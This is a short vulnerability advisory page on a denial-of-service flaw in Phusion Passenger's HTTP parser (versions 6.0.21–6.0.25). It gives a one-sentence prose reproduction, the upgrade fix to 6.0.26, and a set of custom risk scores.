Volerion logoVolerion
Volerion logoVolerion

Phusion Passenger Denial-of-Service Vulnerability in HTTP Parser

Vulnerability

A denial-of-service vulnerability has been identified in the HTTP parser of Phusion Passenger versions 6.0.21 through 6.0.25, prior to 6.0.26. The issue arises when the parser processes a request containing an invalid HTTP method, leading to a service disruption.

Impact

Exploitation of this vulnerability causes a denial-of-service condition, where the server becomes unresponsive or fails to process requests properly.

Reproduction

The vulnerability can be reproduced by sending an HTTP request to a server running Phusion Passenger 6.0.21 to 6.0.25 with an unrecognized HTTP method. The server will respond with a '400 Bad Request' error, but the invalid method can cause a denial-of-service condition by disrupting normal request processing.

Remediation

Users are advised to upgrade to Phusion Passenger version 6.0.26, which addresses this vulnerability. Instructions for upgrading are available in the Phusion Passenger documentation.

Added: Jun 9, 2025, 7:46 PM
Updated: Jun 9, 2025, 7:46 PM

Vulnerability Rating

Custom Algorithm
spread
6.4
impact
2.5
exploitability
9.3
remediation
7.7
relevance
0.0
threat
4.8
urgency
2.9
incentive
10.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.